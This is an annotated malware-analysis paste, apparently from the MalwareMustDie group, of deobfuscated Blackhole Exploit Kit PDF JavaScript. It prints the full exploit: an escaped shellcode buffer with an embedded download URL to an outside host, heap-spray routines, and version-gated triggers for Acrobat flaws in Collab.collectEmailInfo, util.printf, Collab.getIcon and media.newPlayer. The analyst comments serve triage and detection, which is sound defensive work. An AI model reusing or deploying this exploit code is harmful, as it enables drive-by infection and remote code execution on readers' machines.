MalwareMustDie

#MalwareMustDie - BHEK2/PluginDetect0.7.9-PDF/JS-deobs

Nov 17th, 2012
  // Analyst note: `bjsg` is a %uXXXX-escaped buffer. Every routine in this listing passes it to
  // unescape() and appends the result to a filler string, so this is the payload that the
  // heap-spray blocks carry.
  // Each %uXXXX unit becomes one 16-bit character; read as byte pairs with the low byte first,
  // the last five lines (from %u7468%u7074%u2f3a onward) decode to an ASCII URL, defanged here:
  //   hxxp://203[.]80[.]16[.]81:8080/forum/links/column.php?...
  // That string is the network indicator to extract when triaging this sample. The bytes before
  // it look like x86 shellcode (presumably a downloader; not disassembled in this listing).
  1. bjsg = '
  2. %u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db
  3. %u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175
  4. %uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33
  5. %ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b
  6. %uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433
  7. %u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68
  8. %u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d
  9. %u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224
  10. %u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b
  11. %uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830
  12. %u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83
  13. %u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff
  14. %ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f
  15. %u7468%u7074%u2f3a%u322f%u3330%u382e%u2e30%u3631%u382e%u3a31%u3038%u3038%u662f%u726f%u6d75
  16. %u6c2f%u6e69%u736b%u632f%u6c6f%u6d75%u2e6e%u6870%u3f70%u6676%u3d67%u3033%u313a%u3a6e%u6931
  17. %u313a%u3a69%u3333%u6326%u6361%u706a%u323d%u3a76%u6b31%u313a%u3a6d%u3233%u333a%u3a33%u6b31
  18. %u313a%u3a6b%u3133%u313a%u3a6a%u6f31%u7a26%u7262%u6279%u3d78%u6831%u6726%u6866%u783d%u6f64
  19. %u2671%u7368%u6870%u3d67%u6465%u7869%u6967%u6c64%u0000';
  // Analyst note — ezvr(ra, qy): filler-string builder used by bx() and geticon().
  // Doubles `ra` until ra.length * 2 is at least `qy`, then truncates it to qy / 2 characters.
  // The *2 and /2 suggest `qy` is a byte count and each character is counted as two bytes
  // (inferred from the arithmetic, not stated anywhere in the sample).
  20. function ezvr(ra, qy){
  21.   while (ra.length * 2 < qy){
  22.     ra += ra
  23.   }
  24.   ra = ra.substring(0, qy / 2);
  25.   return ra
  26. }
  // Analyst note — bx(): heap spray followed by an oversized-string call to
  // Collab.collectEmailInfo(). The dispatcher at the bottom of the listing reaches it
  // when sv is 6 or 7 and lv < 7.11.
  // Triage signals: unescape() of %u9090 / %u0c0c units, string-doubling loops, an array filled
  // with identical filler+payload strings, then a single Acrobat API call with a huge argument.
  27. function bx(){
  28.   var dkg = new Array(); // references to the sprayed strings (presumably kept so they stay allocated)
  29.   var vw = 0x0c0c0c0c; // same byte pattern as the %u0c0c units used for `overflow` below
  30.   var addr = 0x400000; // used below as the size budget of one sprayed block
  31.   var payload = unescape(bjsg);
  32.   var sc_len = payload.length * 2; // payload length counted as two bytes per character
  33.   var qy = addr - (sc_len + 0x38); // filler size = block budget - payload - 0x38 (presumably string header overhead)
  34.   var yarsp = unescape("%u9090%u9090");
  35.   yarsp = ezvr(yarsp, qy);
  36.   var count2 = (vw - 0x400000) / addr; // about 47.2, so the loop below runs 48 times
  37.   for (var count = 0; count < count2; count ++ ){
  38.     dkg[count] = yarsp + payload
  39.   }
  40.   var overflow = unescape("%u0c0c%u0c0c");
  // Doubling from 2 characters, the loop stops at the first power of two >= 44952.
  41.   while (overflow.length < 44952){
  42.     overflow += overflow
  43.   }
  // The oversized `msg` value is the only unusual argument in this call.
  44.   this .collabStore = Collab.collectEmailInfo({
  45.     subj : "", msg : overflow
  46.   }
  47.   )
  48. }
  // Analyst note — printf(): heap spray followed by util.printf() with a "%45000f" format and
  // a very large numeric literal. The dispatcher reaches it when lv == 7.1.
  // Every name except `payload` and `num` is assigned without `var`, so they become implicit
  // globals of the PDF's script context.
  // Triage signals: %u0A0A filler, 1400 identical strings stored in an array, and a printf
  // format whose width is far larger than any legitimate form script would use.
  49. function printf(){
  50.   nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
  51.   var payload = unescape(bjsg);
  52.   heapblock = nop + payload;
  53.   bigblock = unescape("%u0A0A%u0A0A");
  54.   headersize = 20;
  55.   spray = headersize + heapblock.length;
  56.   while (bigblock.length < spray){
  57.     bigblock += bigblock
  58.   }
  59.   fillblock = bigblock.substring(0, spray);
  60.   block = bigblock.substring(0, bigblock.length - spray);
  // Grows `block` until block.length + spray reaches 0x40000 characters.
  61.   while (block.length + spray < 0x40000){
  62.     block = block + block + fillblock
  63.   }
  64.   mem = new Array();
  65.   for (i = 0; i < 1400; i ++ ){
  66.     mem[i] = block + heapblock
  67.   }
  // The literal below is one number that the paste wrapped across four lines.
  68.   var num =
  69. 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
  70. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  71. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  72. 88888888888888888888888888;
  73.   util.printf("%45000f", num)
  74. }
  // Analyst note — geticon(): heap spray followed by Collab.getIcon() with an oversized name.
  // It runs only if app.doc.Collab.getIcon exists; the dispatcher reaches it when lv == 9,
  // or when sv == 8 and lv <= 8.12.
  // The spray arithmetic is the same as in bx() with the constants inlined: 0x400000 block
  // budget, 0x38 deducted, %u9090 filler sized by ezvr().
  // The random-looking local names (hWq500CN, p5AjK65f, ...) are left over from the kit's obfuscator.
  75. function geticon(){
  76.   var arry = new Array();
  77.   if (app.doc.Collab.getIcon){
  78.     var payload = unescape(bjsg);
  79.     var hWq500CN = payload.length * 2; // payload length counted as two bytes per character
  80.     var qy = 0x400000 - (hWq500CN + 0x38);
  81.     var yarsp = unescape("%u9090%u9090");
  82.     yarsp = ezvr(yarsp, qy);
  83.     var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000; // about 47.2, so the loop runs 48 times
  84.     for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
  85.       arry[vqcQD96y] = yarsp + payload
  86.     }
  87.     var tUMhNbGw = unescape("%09"); // a single tab character
  88.     while (tUMhNbGw.length < 0x4000){
  89.       tUMhNbGw += tUMhNbGw
  90.     }
  91.     tUMhNbGw = "N." + tUMhNbGw; // argument is "N." followed by at least 0x4000 tab characters
  92.     app.doc.Collab.getIcon(tUMhNbGw)
  93.   }
  94. }
  // Analyst note — dispatcher: fingerprints the viewer, then calls exactly one routine.
  //   sv = first character of app.viewerVersion, parsed as an integer (no radix passed)
  //   lv = version of the plug-in named 'EScript'; stays undefined if no such plug-in is listed
  // If lv is undefined, every comparison below is false and nothing runs.
  // Triage signals: enumeration of app.plugIns for 'EScript' combined with version-gated
  // branches that end in Collab.*, util.printf or media.newPlayer calls. Disabling JavaScript
  // in the PDF viewer removes this whole code path.
  95. aPlugins = app.plugIns;
  96. var sv = parseInt(app.viewerVersion.toString().charAt(0));
  97. for (var i = 0; i < aPlugins.length; i ++ ){
  98.   if (aPlugins[i].name == 'EScript'){
  99.     var lv = aPlugins[i].version
  100.   }
  101. }
  102. if ((lv == 9) || ((sv == 8) && (lv <= 8.12))){
  103.   geticon()
  104. }
  105. else if (lv == 7.1){
  106.   printf()
  107. }
  108. else if (((sv == 6) || (sv == 7)) && (lv < 7.11)){
  109.   bx()
  110. }
  // NOTE(review): `lv >= 9.1 || lv <= 9.2` is true for any numeric lv, so this branch is entered
  // for every version the earlier branches did not match; the real gate is the inner
  // (i > 8.12) && (i < 8.2) test.
  111. else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)){
  // a() calls util.printd with a fixed format string and the current date. Its purpose is not
  // evident from this listing; it is called twice before and once after media.newPlayer(null).
  112.   function a(){
  113.     util.printd('p@111111111111111111111111 : yyyy111', new Date())
  114.   }
  // Second, independent lookup of the EScript version; `i` redeclares the loop variable used above.
  115.   var h = app.plugIns;
  116.   for (var f = 0; f < h.length; f ++ ){
  117.     if (h[f].name == 'EScript'){
  118.       var i = h[f].version
  119.     }
  120.   }
  121.   if ((i > 8.12) && (i < 8.2)){
  122.     c = new Array(); // implicit global holding the sprayed strings
  123.     var d = unescape('%u9090%u9090');
  124.     var e = unescape(bjsg);
  125.     while (d.length <= 0x8000){
  126.       d += d
  127.     }
  128.     d = d.substr(0, 0x8000 - e.length); // filler + payload together are 0x8000 characters
  129.     for (f = 0; f < 2900; f ++ ){
  130.       c[f] = d + e
  131.     }
  132.     a();
  133.     a();
  // The empty catch hides any exception from media.newPlayer(null), so the script continues silently.
  134.     try {
  135.       this .media.newPlayer(null)
  136.     }
  137.     catch (e){
  138.     }
  139.     a()
  140.   }
  141. }